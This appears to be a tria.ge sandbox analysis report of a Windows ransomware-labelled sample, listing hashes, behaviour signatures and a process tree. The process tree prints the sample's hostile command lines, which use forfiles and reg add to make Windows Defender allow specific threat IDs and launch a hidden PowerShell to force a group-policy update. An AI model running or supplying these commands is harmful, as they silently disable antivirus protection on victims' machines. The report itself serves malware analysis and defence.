Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
97s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02/09/2024, 11:23
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe
-
Size
6.7MB
-
MD5
0041e8bf2ba98bc2aca9852d5667e244
-
SHA1
5b9ae5d856e7fd5cb08538aed4360a933c46114e
-
SHA256
34d1686143c6c81e76ec46086f81c65ccd17a46ca279da4c64691dd69af86049
-
SHA512
8ab9d46a9d4e05ad5a823cb74e3f336d6bdc665aa443a62bd71ecb98603d9568cb3267893d2817fccd93719afa707ecaf1fcb162fcd501753a05bf1f7dbdfc7e
-
SSDEEP
196608:/FC364Cf8WLJsckCEe6pwCmlZohTFLROTW8kD:nEWdscxPCXTFNOoD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 8 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation 2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 4432 forfiles.exe 4820 forfiles.exe 2004 forfiles.exe 400 forfiles.exe 4556 forfiles.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4452 2208 WerFault.exe 82 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 8 powershell.exe 8 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 8 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2208 wrote to memory of 1200 2208 2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe 86 PID 2208 wrote to memory of 1200 2208 2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe 86 PID 2208 wrote to memory of 1200 2208 2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe 86 PID 1200 wrote to memory of 2004 1200 cmd.exe 88 PID 1200 wrote to memory of 2004 1200 cmd.exe 88 PID 1200 wrote to memory of 2004 1200 cmd.exe 88 PID 2004 wrote to memory of 4384 2004 forfiles.exe 89 PID 2004 wrote to memory of 4384 2004 forfiles.exe 89 PID 2004 wrote to memory of 4384 2004 forfiles.exe 89 PID 4384 wrote to memory of 4076 4384 cmd.exe 90 PID 4384 wrote to memory of 4076 4384 cmd.exe 90 PID 4384 wrote to memory of 4076 4384 cmd.exe 90 PID 1200 wrote to memory of 400 1200 cmd.exe 91 PID 1200 wrote to memory of 400 1200 cmd.exe 91 PID 1200 wrote to memory of 400 1200 cmd.exe 91 PID 400 wrote to memory of 1716 400 forfiles.exe 92 PID 400 wrote to memory of 1716 400 forfiles.exe 92 PID 400 wrote to memory of 1716 400 forfiles.exe 92 PID 1716 wrote to memory of 2636 1716 cmd.exe 93 PID 1716 wrote to memory of 2636 1716 cmd.exe 93 PID 1716 wrote to memory of 2636 1716 cmd.exe 93 PID 1200 wrote to memory of 4556 1200 cmd.exe 94 PID 1200 wrote to memory of 4556 1200 cmd.exe 94 PID 1200 wrote to memory of 4556 1200 cmd.exe 94 PID 4556 wrote to memory of 1560 4556 forfiles.exe 95 PID 4556 wrote to memory of 1560 4556 forfiles.exe 95 PID 4556 wrote to memory of 1560 4556 forfiles.exe 95 PID 1560 wrote to memory of 396 1560 cmd.exe 96 PID 1560 wrote to memory of 396 1560 cmd.exe 96 PID 1560 wrote to memory of 396 1560 cmd.exe 96 PID 1200 wrote to memory of 4432 1200 cmd.exe 97 PID 1200 wrote to memory of 4432 1200 cmd.exe 97 PID 1200 wrote to memory of 4432 1200 cmd.exe 97 PID 4432 wrote to memory of 2308 4432 forfiles.exe 98 PID 4432 wrote to memory of 2308 4432 forfiles.exe 98 PID 4432 wrote to memory of 2308 4432 forfiles.exe 98 PID 2308 wrote to memory of 2840 2308 cmd.exe 99 PID 2308 wrote to memory of 2840 2308 cmd.exe 99 PID 2308 wrote to memory of 2840 2308 cmd.exe 99 PID 1200 wrote to memory of 4820 1200 cmd.exe 100 PID 1200 wrote to memory of 4820 1200 cmd.exe 100 PID 1200 wrote to memory of 4820 1200 cmd.exe 100 PID 4820 wrote to memory of 832 4820 forfiles.exe 101 PID 4820 wrote to memory of 832 4820 forfiles.exe 101 PID 4820 wrote to memory of 832 4820 forfiles.exe 101 PID 832 wrote to memory of 8 832 cmd.exe 102 PID 832 wrote to memory of 8 832 cmd.exe 102 PID 832 wrote to memory of 8 832 cmd.exe 102 PID 8 wrote to memory of 3704 8 powershell.exe 105 PID 8 wrote to memory of 3704 8 powershell.exe 105 PID 8 wrote to memory of 3704 8 powershell.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-02_0041e8bf2ba98bc2aca9852d5667e244_bkransomware.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4384 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4076
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1716 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1560 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:396
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2840
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:3704
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6482⤵
- Program crash
PID:4452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2208 -ip 22081⤵PID:3372
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82